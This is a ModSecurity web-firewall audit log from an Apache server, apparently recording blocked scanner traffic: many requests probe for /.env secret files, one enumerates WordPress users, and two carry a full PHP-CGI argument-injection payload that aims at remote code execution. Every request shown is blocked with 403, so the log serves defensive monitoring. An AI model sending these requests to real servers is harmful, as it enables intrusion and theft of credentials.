Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db95401-Z-- --3f3f4a57-A-- [26/May/2025:10:36:45 +0700] aDPhzVSmKJQK-9oQ9SRVRwAAAIQ 103.236.140.4 57776 103.236.140.4 8181 --3f3f4a57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.233.172 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.233.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3f3f4a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f3f4a57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748230605412440 795 (- - -) Stopwatch2: 1748230605412440 795; combined=317, p1=278, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f3f4a57-Z-- --7bf2803a-A-- [26/May/2025:10:42:14 +0700] aDPjFlSmKJQK-9oQ9SRVWgAAAII 103.236.140.4 57840 103.236.140.4 8181 --7bf2803a-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 134.122.28.88 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 134.122.28.88 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --7bf2803a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bf2803a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748230934070734 828 (- - -) Stopwatch2: 1748230934070734 828; combined=345, p1=319, p2=0, p3=0, p4=0, p5=26, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bf2803a-Z-- --a70e414e-A-- [26/May/2025:10:52:14 +0700] aDPlbnFOzWd_Ai7zJXXaHQAAAA4 103.236.140.4 58082 103.236.140.4 8181 --a70e414e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 64.227.104.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 64.227.104.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a70e414e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a70e414e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748231534317147 2846 (- - -) Stopwatch2: 1748231534317147 2846; combined=1295, p1=433, p2=833, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a70e414e-Z-- --83ac5a65-A-- [26/May/2025:11:13:23 +0700] aDPqY1SmKJQK-9oQ9SRVagAAAIA 103.236.140.4 58320 103.236.140.4 8181 --83ac5a65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 SUSE/6.0.428.0 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 Accept-Charset: utf-8 --83ac5a65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83ac5a65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748232803409210 879 (- - -) Stopwatch2: 1748232803409210 879; combined=347, p1=306, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83ac5a65-Z-- --ef16b635-A-- [26/May/2025:12:20:36 +0700] aDP6JM-W3hHsdQpQwdT1MAAAANY 103.236.140.4 58844 103.236.140.4 8181 --ef16b635-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 157.245.113.227 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 157.245.113.227 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ef16b635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef16b635-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748236836013849 725 (- - -) Stopwatch2: 1748236836013849 725; combined=274, p1=247, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef16b635-Z-- --f5a9be5c-A-- [26/May/2025:12:47:34 +0700] aDQAdnFOzWd_Ai7zJXXbMAAAAAA 103.236.140.4 60558 103.236.140.4 8181 --f5a9be5c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 46.101.111.185 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f5a9be5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5a9be5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748238454447208 840 (- - -) Stopwatch2: 1748238454447208 840; combined=332, p1=291, p2=0, p3=0, p4=0, p5=40, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5a9be5c-Z-- --d756783e-A-- [26/May/2025:13:13:31 +0700] aDQGi3FOzWd_Ai7zJXXtKgAAABA 103.236.140.4 39198 103.236.140.4 8181 --d756783e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --d756783e-C-- --d756783e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d756783e-E-- --d756783e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748240011656189 4758 (- - -) Stopwatch2: 1748240011656189 4758; combined=3019, p1=495, p2=2476, p3=0, p4=0, p5=47, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d756783e-Z-- --dbe3e315-A-- [26/May/2025:13:21:26 +0700] aDQIZlSmKJQK-9oQ9SRrhQAAAJQ 103.236.140.4 49164 103.236.140.4 8181 --dbe3e315-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --dbe3e315-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbe3e315-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748240486453168 810 (- - -) Stopwatch2: 1748240486453168 810; combined=303, p1=268, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbe3e315-Z-- --662e9022-A-- [26/May/2025:13:29:37 +0700] aDQKUc-W3hHsdQpQwdQSGAAAANg 103.236.140.4 59654 103.236.140.4 8181 --662e9022-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.181.249 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --662e9022-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --662e9022-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748240977209394 805 (- - -) Stopwatch2: 1748240977209394 805; combined=322, p1=281, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --662e9022-Z-- --7acde368-A-- [26/May/2025:15:01:14 +0700] aDQfyv7lSIOiZEhmvSz_awAAAEI 103.236.140.4 47374 103.236.140.4 8181 --7acde368-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --7acde368-C-- --7acde368-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7acde368-E-- --7acde368-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748246474221641 3685 (- - -) Stopwatch2: 1748246474221641 3685; combined=2370, p1=438, p2=1897, p3=0, p4=0, p5=35, sr=111, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7acde368-Z-- --b6eb7950-A-- [26/May/2025:15:08:09 +0700] aDQhaXFOzWd_Ai7zJXVKfAAAAAU 103.236.140.4 37092 103.236.140.4 8181 --b6eb7950-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.46.149 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.46.149 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b6eb7950-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6eb7950-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748246889122514 588 (- - -) Stopwatch2: 1748246889122514 588; combined=221, p1=193, p2=0, p3=0, p4=0, p5=28, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6eb7950-Z-- --64f80333-A-- [26/May/2025:16:40:21 +0700] aDQ3BVSmKJQK-9oQ9SQvJwAAAIU 103.236.140.4 52592 103.236.140.4 8181 --64f80333-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept-Charset: utf-8 --64f80333-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64f80333-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748252421773286 734 (- - -) Stopwatch2: 1748252421773286 734; combined=294, p1=258, p2=0, p3=0, p4=0, p5=36, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64f80333-Z-- --21cd572e-A-- [26/May/2025:16:40:33 +0700] aDQ3Ec-W3hHsdQpQwdTXmgAAAMk 103.236.140.4 52914 103.236.140.4 8181 --21cd572e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Accept-Charset: utf-8 --21cd572e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21cd572e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748252433052334 710 (- - -) Stopwatch2: 1748252433052334 710; combined=289, p1=255, p2=0, p3=0, p4=0, p5=34, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21cd572e-Z-- --01a2bf36-A-- [26/May/2025:17:15:27 +0700] aDQ_P8-W3hHsdQpQwdTyTAAAANU 103.236.140.4 54624 103.236.140.4 8181 --01a2bf36-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0b10) Gecko/20100101 Firefox/4.0b10 --01a2bf36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01a2bf36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254527753094 3905 (- - -) Stopwatch2: 1748254527753094 3905; combined=552, p1=448, p2=0, p3=0, p4=0, p5=104, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01a2bf36-Z-- --8e6be64a-A-- [26/May/2025:17:15:28 +0700] aDQ_QFSmKJQK-9oQ9SRLLQAAAII 103.236.140.4 54634 103.236.140.4 8181 --8e6be64a-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; LG-VS410PP Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --8e6be64a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e6be64a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254528011717 824 (- - -) Stopwatch2: 1748254528011717 824; combined=282, p1=240, p2=0, p3=0, p4=0, p5=42, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e6be64a-Z-- --8f50a135-A-- [26/May/2025:17:15:28 +0700] aDQ_QHFOzWd_Ai7zJXWttwAAABU 103.236.140.4 54644 103.236.140.4 8181 --8f50a135-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0 --8f50a135-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f50a135-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254528227822 905 (- - -) Stopwatch2: 1748254528227822 905; combined=349, p1=301, p2=0, p3=0, p4=0, p5=47, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f50a135-Z-- --0655d33e-A-- [26/May/2025:17:15:28 +0700] aDQ_QP7lSIOiZEhmvSx4_gAAAFI 103.236.140.4 54650 103.236.140.4 8181 --0655d33e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HTC_0PCV220/1.11.506.8 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --0655d33e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0655d33e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254528382544 933 (- - -) Stopwatch2: 1748254528382544 933; combined=353, p1=311, p2=0, p3=0, p4=0, p5=42, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0655d33e-Z-- --56aebc3f-A-- [26/May/2025:17:15:34 +0700] aDQ_RnFOzWd_Ai7zJXWtxwAAAAQ 103.236.140.4 54826 103.236.140.4 8181 --56aebc3f-B-- GET /backend/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko --56aebc3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56aebc3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254534422216 778 (- - -) Stopwatch2: 1748254534422216 778; combined=296, p1=259, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56aebc3f-Z-- --087e742e-A-- [26/May/2025:17:15:35 +0700] aDQ_R1SmKJQK-9oQ9SRLRAAAAIU 103.236.140.4 54870 103.236.140.4 8181 --087e742e-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 --087e742e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --087e742e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254535740727 651 (- - -) Stopwatch2: 